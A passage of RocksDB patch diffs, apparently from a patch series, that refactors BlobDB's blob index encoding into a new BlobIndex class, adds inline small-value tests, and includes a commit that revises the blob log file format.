bfptr, s = new_writer->AddRecord(record.Key(), record.Blob(), &new_key_offset, &new_blob_offset, record.GetTTL()); - BlobHandle new_handle; - new_handle.set_filenumber(newfile->BlobFileNumber()); - new_handle.set_size(record.Blob().size()); - new_handle.set_offset(new_blob_offset); - new_handle.set_compression(bdb_options_.compression); - new_handle.EncodeTo(&new_index_entry); + BlobIndex::EncodeBlob(&new_index_entry, newfile->BlobFileNumber(), + new_blob_offset, record.Blob().size(), + bdb_options_.compression); newfile->blob_count_++; newfile->file_size_ += @@ -2268,6 +2166,11 @@ Status DestroyBlobDB(const std::string& dbname, const Options& options, } #ifndef NDEBUG +Status BlobDBImpl::TEST_GetBlobValue(const Slice& key, const Slice& index_entry, + PinnableSlice* value) { + return GetBlobValue(key, index_entry, value); +} + std::vector> BlobDBImpl::TEST_GetBlobFiles() const { ReadLock l(&mutex_); std::vector> blob_files; diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index 6496c585d34..b18d26e1f4e 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -15,6 +15,7 @@ #include #include #include +#include #include #include @@ -215,9 +216,6 @@ class BlobDBImpl : public BlobDB { Status Get(const ReadOptions& read_options, ColumnFamilyHandle* column_family, const Slice& key, PinnableSlice* value) override; - Status GetBlobValue(const Slice& key, const Slice& index_entry, - PinnableSlice* value); - using BlobDB::NewIterator; virtual Iterator* NewIterator(const ReadOptions& read_options) override; @@ -249,7 +247,7 @@ class BlobDBImpl : public BlobDB { using BlobDB::PutUntil; Status PutUntil(const WriteOptions& options, const Slice& key, - const Slice& value_unc, uint64_t expiration) override; + const Slice& value, uint64_t expiration) override; Status LinkToBaseDB(DB* db) override; @@ -263,6 +261,9 @@ class BlobDBImpl : public BlobDB { ~BlobDBImpl(); #ifndef NDEBUG + Status TEST_GetBlobValue(const Slice& key, const Slice& index_entry, + PinnableSlice* value); + std::vector> TEST_GetBlobFiles() const; std::vector> TEST_GetObsoleteFiles() const; @@ -281,6 +282,7 @@ class BlobDBImpl : public BlobDB { private: class GarbageCollectionWriteCallback; + class BlobInserter; Status OpenPhase1(); @@ -288,6 +290,9 @@ class BlobDBImpl : public BlobDB { // Return true if a snapshot is created. bool SetSnapshotIfNeeded(ReadOptions* read_options); + Status GetBlobValue(const Slice& key, const Slice& index_entry, + PinnableSlice* value); + Slice GetCompressedSlice(const Slice& raw, std::string* compression_output) const; @@ -314,9 +319,14 @@ class BlobDBImpl : public BlobDB { uint64_t ExtractExpiration(const Slice& key, const Slice& value, Slice* value_slice, std::string* new_value); + Status PutBlobValue(const WriteOptions& options, const Slice& key, + const Slice& value, uint64_t expiration, + SequenceNumber sequence, WriteBatch* batch); + Status AppendBlob(const std::shared_ptr& bfile, const std::string& headerbuf, const Slice& key, - const Slice& value, std::string* index_entry); + const Slice& value, uint64_t expiration, + std::string* index_entry); // find an existing blob log file based on the expiration unix epoch // if such a file does not exist, return nullptr @@ -327,8 +337,6 @@ class BlobDBImpl : public BlobDB { std::shared_ptr FindBlobFileLocked(uint64_t expiration) const; - void UpdateWriteOptions(const WriteOptions& options); - void Shutdown(); // periodic sanity check. Bunch of checks @@ -426,10 +434,6 @@ class BlobDBImpl : public BlobDB { Env* env_; TTLExtractor* ttl_extractor_; - // a boolean to capture whether write_options has been set - std::atomic wo_set_; - WriteOptions write_options_; - // the options that govern the behavior of Blob Storage BlobDBOptions bdb_options_; DBOptions db_options_; diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 592ee609cff..6f16e5b3d4c 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -5,19 +5,24 @@ #ifndef ROCKSDB_LITE -#include "utilities/blob_db/blob_db.h" +#include #include #include #include #include +#include + #include "db/db_test_util.h" #include "port/port.h" +#include "rocksdb/utilities/debug.h" #include "util/cast_util.h" #include "util/random.h" #include "util/string_util.h" #include "util/sync_point.h" #include "util/testharness.h" +#include "utilities/blob_db/blob_db.h" #include "utilities/blob_db/blob_db_impl.h" +#include "utilities/blob_db/blob_index.h" namespace rocksdb { namespace blob_db { @@ -26,6 +31,12 @@ class BlobDBTest : public testing::Test { public: const int kMaxBlobSize = 1 << 14; + struct BlobRecord { + std::string key; + std::string value; + uint64_t expiration = 0; + }; + BlobDBTest() : dbname_(test::TmpDir() + "/blob_db_test"), mock_env_(new MockTimeEnv(Env::Default())), @@ -127,6 +138,32 @@ class BlobDBTest : public testing::Test { delete iter; } + void VerifyBaseDB( + const std::map &expected_versions) { + auto *bdb_impl = static_cast(blob_db_); + DB *db = blob_db_->GetRootDB(); + std::vector versions; + GetAllKeyVersions(db, "", "", &versions); + ASSERT_EQ(expected_versions.size(), versions.size()); + size_t i = 0; + for (auto &key_version : expected_versions) { + const KeyVersion &expected_version = key_version.second; + ASSERT_EQ(expected_version.user_key, versions[i].user_key); + ASSERT_EQ(expected_version.sequence, versions[i].sequence); + ASSERT_EQ(expected_version.type, versions[i].type); + if (versions[i].type == kTypeValue) { + ASSERT_EQ(expected_version.value, versions[i].value); + } else { + ASSERT_EQ(kTypeBlobIndex, versions[i].type); + PinnableSlice value; + ASSERT_OK(bdb_impl->TEST_GetBlobValue(versions[i].user_key, + versions[i].value, &value)); + ASSERT_EQ(expected_version.value, value.ToString()); + } + i++; + } + } + void InsertBlobs() { WriteOptions wo; std::string value; @@ -151,6 +188,7 @@ class BlobDBTest : public testing::Test { TEST_F(BlobDBTest, Put) { Random rnd(301); BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); std::map data; @@ -166,6 +204,7 @@ TEST_F(BlobDBTest, PutWithTTL) { options.env = mock_env_.get(); BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; + bdb_options.min_blob_size = 0; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.disable_background_tasks = true; Open(bdb_options, options); @@ -195,6 +234,7 @@ TEST_F(BlobDBTest, PutUntil) { options.env = mock_env_.get(); BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; + bdb_options.min_blob_size = 0; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.disable_background_tasks = true; Open(bdb_options, options); @@ -226,6 +266,7 @@ TEST_F(BlobDBTest, TTLExtrator_NoTTL) { options.env = mock_env_.get(); BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; + bdb_options.min_blob_size = 0; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.num_concurrent_simple_blobs = 1; bdb_options.ttl_extractor = ttl_extractor_; @@ -275,6 +316,7 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractTTL) { options.env = mock_env_.get(); BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; + bdb_options.min_blob_size = 0; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.ttl_extractor = ttl_extractor_; bdb_options.disable_background_tasks = true; @@ -322,6 +364,7 @@ TEST_F(BlobDBTest, TTLExtractor_ExtractExpiration) { options.env = mock_env_.get(); BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; + bdb_options.min_blob_size = 0; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.ttl_extractor = ttl_extractor_; bdb_options.disable_background_tasks = true; @@ -369,6 +412,7 @@ TEST_F(BlobDBTest, TTLExtractor_ChangeValue) { options.env = mock_env_.get(); BlobDBOptions bdb_options; bdb_options.ttl_range_secs = 1000; + bdb_options.min_blob_size = 0; bdb_options.blob_file_size = 256 * 1000 * 1000; bdb_options.ttl_extractor = std::make_shared(); bdb_options.disable_background_tasks = true; @@ -403,6 +447,7 @@ TEST_F(BlobDBTest, TTLExtractor_ChangeValue) { TEST_F(BlobDBTest, StackableDBGet) { Random rnd(301); BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); std::map data; @@ -425,6 +470,7 @@ TEST_F(BlobDBTest, StackableDBGet) { TEST_F(BlobDBTest, WriteBatch) { Random rnd(301); BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); std::map data; @@ -441,6 +487,7 @@ TEST_F(BlobDBTest, WriteBatch) { TEST_F(BlobDBTest, Delete) { Random rnd(301); BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); std::map data; @@ -456,6 +503,7 @@ TEST_F(BlobDBTest, Delete) { TEST_F(BlobDBTest, DeleteBatch) { Random rnd(301); BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); for (size_t i = 0; i < 100; i++) { @@ -473,6 +521,7 @@ TEST_F(BlobDBTest, DeleteBatch) { TEST_F(BlobDBTest, Override) { Random rnd(301); BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); std::map data; @@ -490,6 +539,7 @@ TEST_F(BlobDBTest, Override) { TEST_F(BlobDBTest, Compression) { Random rnd(301); BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; bdb_options.compression = CompressionType::kSnappyCompression; Open(bdb_options); @@ -541,6 +591,7 @@ TEST_F(BlobDBTest, MultipleWriters) { TEST_F(BlobDBTest, GCAfterOverwriteKeys) { Random rnd(301); BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); BlobDBImpl *blob_db_impl = @@ -580,6 +631,7 @@ TEST_F(BlobDBTest, GCAfterOverwriteKeys) { TEST_F(BlobDBTest, GCRelocateKeyWhileOverwriting) { Random rnd(301); BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); ASSERT_OK(blob_db_->Put(WriteOptions(), "foo", "v1")); @@ -591,8 +643,8 @@ TEST_F(BlobDBTest, GCRelocateKeyWhileOverwriting) { SyncPoint::GetInstance()->LoadDependency( {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB", - "BlobDBImpl::PutUntil:Start"}, - {"BlobDBImpl::PutUntil:Finish", + "BlobDBImpl::PutBlobValue:Start"}, + {"BlobDBImpl::PutBlobValue:Finish", "BlobDBImpl::GCFileAndUpdateLSM:BeforeRelocate"}}); SyncPoint::GetInstance()->EnableProcessing(); @@ -615,6 +667,7 @@ TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) { Options options; options.env = mock_env_.get(); BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options, options); mock_env_->set_current_time(100); @@ -628,8 +681,8 @@ TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) { SyncPoint::GetInstance()->LoadDependency( {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB", - "BlobDBImpl::PutUntil:Start"}, - {"BlobDBImpl::PutUntil:Finish", + "BlobDBImpl::PutBlobValue:Start"}, + {"BlobDBImpl::PutBlobValue:Finish", "BlobDBImpl::GCFileAndUpdateLSM:BeforeDelete"}}); SyncPoint::GetInstance()->EnableProcessing(); @@ -656,6 +709,7 @@ TEST_F(BlobDBTest, GCOldestSimpleBlobFileWhenOutOfSpace) { bdb_options.is_fifo = true; bdb_options.blob_dir_size = 100; bdb_options.blob_file_size = 100; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); std::string value(100, 'v'); @@ -687,6 +741,7 @@ TEST_F(BlobDBTest, ReadWhileGC) { // run the same test for Get(), MultiGet() and Iterator each. for (int i = 0; i < 2; i++) { BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); blob_db_->Put(WriteOptions(), "foo", "bar"); @@ -798,6 +853,7 @@ TEST_F(BlobDBTest, ColumnFamilyNotSupported) { TEST_F(BlobDBTest, GetLiveFilesMetaData) { Random rnd(301); BlobDBOptions bdb_options; + bdb_options.min_blob_size = 0; bdb_options.disable_background_tasks = true; Open(bdb_options); std::map data; @@ -894,6 +950,75 @@ TEST_F(BlobDBTest, OutOfSpace) { ASSERT_TRUE(s.IsNoSpace()); } +TEST_F(BlobDBTest, InlineSmallValues) { + constexpr uint64_t kMaxExpiration = 1000; + Random rnd(301); + BlobDBOptions bdb_options; + bdb_options.ttl_range_secs = kMaxExpiration; + bdb_options.min_blob_size = 100; + bdb_options.blob_file_size = 256 * 1000 * 1000; + bdb_options.disable_background_tasks = true; + Options options; + options.env = mock_env_.get(); + mock_env_->set_current_time(0); + Open(bdb_options, options); + std::map data; + std::map versions; + SequenceNumber first_non_ttl_seq = kMaxSequenceNumber; + SequenceNumber first_ttl_seq = kMaxSequenceNumber; + SequenceNumber last_non_ttl_seq = 0; + SequenceNumber last_ttl_seq = 0; + for (size_t i = 0; i < 1000; i++) { + bool is_small_value = rnd.Next() % 2; + bool has_ttl = rnd.Next() % 2; + uint64_t expiration = rnd.Next() % kMaxExpiration; + int len = is_small_value ? 50 : 200; + std::string key = "key" + ToString(i); + std::string value = test::RandomHumanReadableString(&rnd, len); + std::string blob_index; + data[key] = value; + SequenceNumber sequence = blob_db_->GetLatestSequenceNumber() + 1; + if (!has_ttl) { + ASSERT_OK(blob_db_->Put(WriteOptions(), key, value)); + } else { + ASSERT_OK(blob_db_->PutUntil(WriteOptions(), key, value, expiration)); + } + ASSERT_EQ(blob_db_->GetLatestSequenceNumber(), sequence); + versions[key] = + KeyVersion(key, value, sequence, + (is_small_value && !has_ttl) ? kTypeValue : kTypeBlobIndex); + if (!is_small_value) { + if (!has_ttl) { + first_non_ttl_seq = std::min(first_non_ttl_seq, sequence); + last_non_ttl_seq = std::max(last_non_ttl_seq, sequence); + } else { + first_ttl_seq = std::min(first_ttl_seq, sequence); + last_ttl_seq = std::max(last_ttl_seq, sequence); + } + } + } + VerifyDB(data); + VerifyBaseDB(versions); + auto *bdb_impl = static_cast(blob_db_); + auto blob_files = bdb_impl->TEST_GetBlobFiles(); + ASSERT_EQ(2, blob_files.size()); + std::shared_ptr non_ttl_file; + std::shared_ptr ttl_file; + if (blob_files[0]->HasTTL()) { + ttl_file = blob_files[0]; + non_ttl_file = blob_files[1]; + } else { + non_ttl_file = blob_files[0]; + ttl_file = blob_files[1]; + } + ASSERT_FALSE(non_ttl_file->HasTTL()); + ASSERT_EQ(first_non_ttl_seq, non_ttl_file->GetSNRange().first); + ASSERT_EQ(last_non_ttl_seq, non_ttl_file->GetSNRange().second); + ASSERT_TRUE(ttl_file->HasTTL()); + ASSERT_EQ(first_ttl_seq, ttl_file->GetSNRange().first); + ASSERT_EQ(last_ttl_seq, ttl_file->GetSNRange().second); +} + } // namespace blob_db } // namespace rocksdb diff --git a/utilities/blob_db/blob_file.cc b/utilities/blob_db/blob_file.cc index b247a69f33d..9989bacf3d8 100644 --- a/utilities/blob_db/blob_file.cc +++ b/utilities/blob_db/blob_file.cc @@ -15,6 +15,7 @@ #include #include +#include "db/dbformat.h" #include "util/filename.h" #include "util/logging.h" #include "utilities/blob_db/blob_db_impl.h" @@ -36,7 +37,7 @@ BlobFile::BlobFile() gc_once_after_open_(false), ttl_range_(std::make_pair(0, 0)), time_range_(std::make_pair(0, 0)), - sn_range_(std::make_pair(0, 0)), + sn_range_(std::make_pair(kMaxSequenceNumber, 0)), last_access_(-1), last_fsync_(0), header_valid_(false) {} @@ -55,7 +56,7 @@ BlobFile::BlobFile(const BlobDBImpl* p, const std::string& bdir, uint64_t fn) gc_once_after_open_(false), ttl_range_(std::make_pair(0, 0)), time_range_(std::make_pair(0, 0)), - sn_range_(std::make_pair(0, 0)), + sn_range_(std::make_pair(kMaxSequenceNumber, 0)), last_access_(-1), last_fsync_(0), header_valid_(false) {} diff --git a/utilities/blob_db/blob_index.h b/utilities/blob_db/blob_index.h new file mode 100644 index 00000000000..fd91b547a84 --- /dev/null +++ b/utilities/blob_db/blob_index.h @@ -0,0 +1,161 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). +#pragma once +#ifndef ROCKSDB_LITE + +#include "rocksdb/options.h" +#include "util/coding.h" +#include "util/string_util.h" + +namespace rocksdb { +namespace blob_db { + +// BlobIndex is a pointer to the blob and metadata of the blob. The index is +// stored in base DB as ValueType::kTypeBlobIndex. +// There are three types of blob index: +// +// kInlinedTTL: +// +------+------------+---------------+ +// | type | expiration | value | +// +------+------------+---------------+ +// | char | varint64 | variable size | +// +------+------------+---------------+ +// +// kBlob: +// +------+-------------+----------+----------+-------------+ +// | type | file number | offset | size | compression | +// +------+-------------+----------+----------+-------------+ +// | char | varint64 | varint64 | varint64 | char | +// +------+-------------+----------+----------+-------------+ +// +// kBlobTTL: +// +------+------------+-------------+----------+----------+-------------+ +// | type | expiration | file number | offset | size | compression | +// +------+------------+-------------+----------+----------+-------------+ +// | char | varint64 | varint64 | varint64 | varint64 | char | +// +------+------------+-------------+----------+----------+-------------+ +// +// There isn't a kInlined (without TTL) type since we can store it as a plain +// value (i.e. ValueType::kTypeValue). +class BlobIndex { + public: + enum class Type : unsigned char { + kInlinedTTL = 0, + kBlob = 1, + kBlobTTL = 2, + kUnknown = 3, + }; + + BlobIndex() : type_(Type::kUnknown) {} + + bool IsInlined() const { return type_ == Type::kInlinedTTL; } + + bool HasTTL() const { + return type_ == Type::kInlinedTTL || type_ == Type::kBlobTTL; + } + + uint64_t expiration() const { + assert(HasTTL()); + return expiration_; + } + + const Slice& value() const { + assert(IsInlined()); + return value_; + } + + uint64_t file_number() const { + assert(!IsInlined()); + return file_number_; + } + + uint64_t offset() const { + assert(!IsInlined()); + return offset_; + } + + uint64_t size() const { + assert(!IsInlined()); + return size_; + } + + Status DecodeFrom(Slice slice) { + static const std::string kErrorMessage = "Error while decoding blob index"; + assert(slice.size() > 0); + type_ = static_cast(*slice.data()); + if (type_ >= Type::kUnknown) { + return Status::Corruption( + kErrorMessage, + "Unknown blob index type: " + ToString(static_cast(type_))); + } + slice = Slice(slice.data() + 1, slice.size() - 1); + if (HasTTL()) { + if (!GetVarint64(&slice, &expiration_)) { + return Status::Corruption(kErrorMessage, "Corrupted expiration"); + } + } + if (IsInlined()) { + value_ = slice; + } else { + if (GetVarint64(&slice, &file_number_) && GetVarint64(&slice, &offset_) && + GetVarint64(&slice, &size_) && slice.size() == 1) { + compression_ = static_cast(*slice.data()); + } else { + return Status::Corruption(kErrorMessage, "Corrupted blob offset"); + } + } + return Status::OK(); + } + + static void EncodeInlinedTTL(std::string* dst, uint64_t expiration, + const Slice& value) { + assert(dst != nullptr); + dst->clear(); + dst->reserve(1 + kMaxVarint64Length + value.size()); + dst->push_back(static_cast(Type::kInlinedTTL)); + PutVarint64(dst, expiration); + dst->append(value.data(), value.size()); + } + + static void EncodeBlob(std::string* dst, uint64_t file_number, + uint64_t offset, uint64_t size, + CompressionType compression) { + assert(dst != nullptr); + dst->clear(); + dst->reserve(kMaxVarint64Length * 3 + 2); + dst->push_back(static_cast(Type::kBlob)); + PutVarint64(dst, file_number); + PutVarint64(dst, offset); + PutVarint64(dst, size); + dst->push_back(static_cast(compression)); + } + + static void EncodeBlobTTL(std::string* dst, uint64_t expiration, + uint64_t file_number, uint64_t offset, + uint64_t size, CompressionType compression) { + assert(dst != nullptr); + dst->clear(); + dst->reserve(kMaxVarint64Length * 4 + 2); + dst->push_back(static_cast(Type::kBlobTTL)); + PutVarint64(dst, expiration); + PutVarint64(dst, file_number); + PutVarint64(dst, offset); + PutVarint64(dst, size); + dst->push_back(static_cast(compression)); + } + + private: + Type type_ = Type::kUnknown; + uint64_t expiration_ = 0; + Slice value_; + uint64_t file_number_ = 0; + uint64_t offset_ = 0; + uint64_t size_ = 0; + CompressionType compression_ = kNoCompression; +}; + +} // namespace blob_db +} // namespace rocksdb +#endif // ROCKSDB_LITE From 9e82540901dd986bbca081d3bb468a6c036f4331 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Fri, 27 Oct 2017 13:14:34 -0700 Subject: [PATCH 179/205] Blob DB: update blob file format Summary: Changing blob file format and some code cleanup around the change. The change with blob log format are: * Remove timestamp field in blob file header, blob file footer and blob records. The field is not being use and often confuse with expiration field. * Blob file header now come with column family id, which always equal to default column family id. It leaves room for future support of column family. * Compression field in blob file header now is a standalone byte (instead of compact encode with flags field) * Blob file footer now come with its own crc. * Key length now being uint64_t instead of uint32_t * Blob CRC now checksum both key and value (instead of value only). * Some reordering of the fields. The list of cleanups: * Better inline comments in blob_log_format.h * rename ttlrange_t and snrange_t to ExpirationRange and SequenceRange respectively. * simplify blob_db::Reader * Move crc checking logic to inside blob_log_format.cc Closes https://github.com/facebook/rocksdb/pull/3081 Differential Revision: D6171304 Pulled By: yiwu-arbug fbshipit-source-id: e4373e0d39264441b7e2fbd0caba93ddd99ea2af --- utilities/blob_db/blob_db_impl.cc | 167 ++++++------ utilities/blob_db/blob_db_test.cc | 8 +- utilities/blob_db/blob_dump_tool.cc | 84 ++---- utilities/blob_db/blob_file.cc | 74 +++--- utilities/blob_db/blob_file.h | 55 ++-- utilities/blob_db/blob_log_format.cc | 367 +++++++++------------------ utilities/blob_db/blob_log_format.h | 300 +++++++--------------- utilities/blob_db/blob_log_reader.cc | 130 ++++------ utilities/blob_db/blob_log_reader.h | 17 +- utilities/blob_db/blob_log_writer.cc | 62 ++--- utilities/blob_db/blob_log_writer.h | 28 +- 11 files changed, 458 insertions(+), 834 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 1b915420fe5..701066f80ff 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -37,16 +37,6 @@ namespace { int kBlockBasedTableVersionFormat = 2; - -void extendTTL(rocksdb::blob_db::ttlrange_t* ttl_range, uint64_t ttl) { - ttl_range->first = std::min(ttl_range->first, ttl); - ttl_range->second = std::max(ttl_range->second, ttl); -} - -void extendTimestamps(rocksdb::blob_db::tsrange_t* ts_range, uint64_t ts) { - ts_range->first = std::min(ts_range->first, ts); - ts_range->second = std::max(ts_range->second, ts); -} } // end namespace namespace rocksdb { @@ -66,10 +56,12 @@ WalFilter::WalProcessingOption BlobReconcileWalFilter::LogRecordFound( bool blobf_compare_ttl::operator()(const std::shared_ptr& lhs, const std::shared_ptr& rhs) const { - if (lhs->ttl_range_.first < rhs->ttl_range_.first) return true; - - if (lhs->ttl_range_.first > rhs->ttl_range_.first) return false; - + if (lhs->expiration_range_.first < rhs->expiration_range_.first) { + return true; + } + if (lhs->expiration_range_.first > rhs->expiration_range_.first) { + return false; + } return lhs->BlobFileNumber() > rhs->BlobFileNumber(); } @@ -332,6 +324,7 @@ Status BlobDBImpl::OpenAllFiles() { bfpath.c_str(), s1.ToString().c_str(), size_bytes); continue; } + bfptr->SetHasTTL(bfptr->header_.has_ttl); bfptr->header_valid_ = true; std::shared_ptr ra_reader = @@ -355,10 +348,8 @@ Status BlobDBImpl::OpenAllFiles() { "File found incomplete (w/o footer) %s", bfpath.c_str()); // sequentially iterate over the file and read all the records - ttlrange_t ttl_range(std::numeric_limits::max(), - std::numeric_limits::min()); - tsrange_t ts_range(std::numeric_limits::max(), - std::numeric_limits::min()); + ExpirationRange expiration_range(std::numeric_limits::max(), + std::numeric_limits::min()); uint64_t blob_count = 0; BlobLogRecord record; @@ -369,10 +360,10 @@ Status BlobDBImpl::OpenAllFiles() { while (reader->ReadRecord(&record, shallow).ok()) { ++blob_count; if (bfptr->HasTTL()) { - extendTTL(&ttl_range, record.GetTTL()); - } - if (bfptr->HasTimestamp()) { - extendTimestamps(&ts_range, record.GetTimeVal()); + expiration_range.first = + std::min(expiration_range.first, record.expiration); + expiration_range.second = + std::max(expiration_range.second, record.expiration); } record_start = reader->GetNextByte(); } @@ -391,24 +382,21 @@ Status BlobDBImpl::OpenAllFiles() { } bfptr->SetBlobCount(blob_count); - bfptr->SetSNRange({0, 0}); - - if (bfptr->HasTimestamp()) bfptr->set_time_range(ts_range); + bfptr->SetSequenceRange({0, 0}); ROCKS_LOG_INFO(db_options_.info_log, "Blob File: %s blob_count: %" PRIu64 - " size_bytes: %" PRIu64 " ts: %d ttl: %d", - bfpath.c_str(), blob_count, size_bytes, - bfptr->HasTimestamp(), bfptr->HasTTL()); + " size_bytes: %" PRIu64 " has_ttl: %d", + bfpath.c_str(), blob_count, size_bytes, bfptr->HasTTL()); if (bfptr->HasTTL()) { - ttl_range.second = - std::max(ttl_range.second, - ttl_range.first + (uint32_t)bdb_options_.ttl_range_secs); - bfptr->set_ttl_range(ttl_range); + expiration_range.second = std::max( + expiration_range.second, + expiration_range.first + (uint32_t)bdb_options_.ttl_range_secs); + bfptr->set_expiration_range(expiration_range); uint64_t now = EpochNow(); - if (ttl_range.second < now) { + if (expiration_range.second < now) { Status fstatus = CreateWriterLocked(bfptr); if (fstatus.ok()) fstatus = bfptr->WriteFooterAndCloseLocked(); if (!fstatus.ok()) { @@ -418,10 +406,11 @@ Status BlobDBImpl::OpenAllFiles() { bfpath.c_str(), fstatus.ToString().c_str()); continue; } else { - ROCKS_LOG_ERROR(db_options_.info_log, - "Blob File Closed: %s now: %d ttl_range: (%d, %d)", - bfpath.c_str(), now, ttl_range.first, - ttl_range.second); + ROCKS_LOG_ERROR( + db_options_.info_log, + "Blob File Closed: %s now: %d expiration_range: (%d, %d)", + bfpath.c_str(), now, expiration_range.first, + expiration_range.second); } } else { open_blob_files_.insert(bfptr); @@ -483,9 +472,9 @@ Status BlobDBImpl::CreateWriterLocked(const std::shared_ptr& bfile) { } Writer::ElemType et = Writer::kEtNone; - if (bfile->file_size_ == BlobLogHeader::kHeaderSize) { + if (bfile->file_size_ == BlobLogHeader::kSize) { et = Writer::kEtFileHdr; - } else if (bfile->file_size_ > BlobLogHeader::kHeaderSize) { + } else if (bfile->file_size_ > BlobLogHeader::kSize) { et = Writer::kEtRecord; } else if (bfile->file_size_) { ROCKS_LOG_WARN(db_options_.info_log, @@ -507,14 +496,14 @@ std::shared_ptr BlobDBImpl::FindBlobFileLocked( if (open_blob_files_.empty()) return nullptr; std::shared_ptr tmp = std::make_shared(); - tmp->ttl_range_ = std::make_pair(expiration, 0); + tmp->expiration_range_ = std::make_pair(expiration, 0); auto citr = open_blob_files_.equal_range(tmp); if (citr.first == open_blob_files_.end()) { assert(citr.second == open_blob_files_.end()); std::shared_ptr check = *(open_blob_files_.rbegin()); - return (check->ttl_range_.second < expiration) ? nullptr : check; + return (check->expiration_range_.second < expiration) ? nullptr : check; } if (citr.first != citr.second) return *(citr.first); @@ -522,8 +511,8 @@ std::shared_ptr BlobDBImpl::FindBlobFileLocked( auto finditr = citr.second; if (finditr != open_blob_files_.begin()) --finditr; - bool b2 = (*finditr)->ttl_range_.second < expiration; - bool b1 = (*finditr)->ttl_range_.first > expiration; + bool b2 = (*finditr)->expiration_range_.second < expiration; + bool b1 = (*finditr)->expiration_range_.first > expiration; return (b1 || b2) ? nullptr : (*finditr); } @@ -560,9 +549,11 @@ std::shared_ptr BlobDBImpl::SelectBlobFile() { return nullptr; } - bfile->file_size_ = BlobLogHeader::kHeaderSize; - bfile->header_.compression_ = bdb_options_.compression; + bfile->file_size_ = BlobLogHeader::kSize; + bfile->header_.compression = bdb_options_.compression; + bfile->header_.has_ttl = false; bfile->header_valid_ = true; + bfile->SetHasTTL(false); // CHECK again WriteLock wl(&mutex_); @@ -603,7 +594,7 @@ std::shared_ptr BlobDBImpl::SelectBlobFileTTL(uint64_t expiration) { uint64_t exp_low = (expiration / bdb_options_.ttl_range_secs) * bdb_options_.ttl_range_secs; uint64_t exp_high = exp_low + bdb_options_.ttl_range_secs; - ttlrange_t ttl_guess = std::make_pair(exp_low, exp_high); + ExpirationRange expiration_range = std::make_pair(exp_low, exp_high); bfile = NewBlobFile("SelectBlobFileTTL"); assert(bfile); @@ -621,14 +612,16 @@ std::shared_ptr BlobDBImpl::SelectBlobFileTTL(uint64_t expiration) { return nullptr; } - bfile->header_.set_ttl_guess(ttl_guess); - bfile->header_.compression_ = bdb_options_.compression; + bfile->header_.expiration_range = expiration_range; + bfile->header_.compression = bdb_options_.compression; + bfile->header_.has_ttl = true; bfile->header_valid_ = true; - bfile->file_size_ = BlobLogHeader::kHeaderSize; + bfile->SetHasTTL(true); + bfile->file_size_ = BlobLogHeader::kSize; // set the first value of the range, since that is // concrete at this time. also necessary to add to open_blob_files_ - bfile->ttl_range_ = ttl_guess; + bfile->expiration_range_ = expiration_range; WriteLock wl(&mutex_); // in case the epoch has shifted in the interim, then check @@ -878,8 +871,7 @@ Status BlobDBImpl::PutBlobValue(const WriteOptions& options, const Slice& key, Slice value_compressed = GetCompressedSlice(value, &compression_output); std::string headerbuf; - Writer::ConstructBlobHeader(&headerbuf, key, value_compressed, expiration, - -1); + Writer::ConstructBlobHeader(&headerbuf, key, value_compressed, expiration); s = AppendBlob(bfile, headerbuf, key, value_compressed, expiration, &index_entry); @@ -887,7 +879,7 @@ Status BlobDBImpl::PutBlobValue(const WriteOptions& options, const Slice& key, if (s.ok()) { bfile->ExtendSequenceRange(sequence); if (expiration != kNoExpiration) { - extendTTL(&(bfile->ttl_range_), expiration); + bfile->ExtendExpirationRange(expiration); } s = CloseBlobFileIfNeeded(bfile); if (s.ok()) { @@ -1045,7 +1037,7 @@ Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, // later from the Blob Header, which needs to be also a // valid offset. if (blob_index.offset() < - 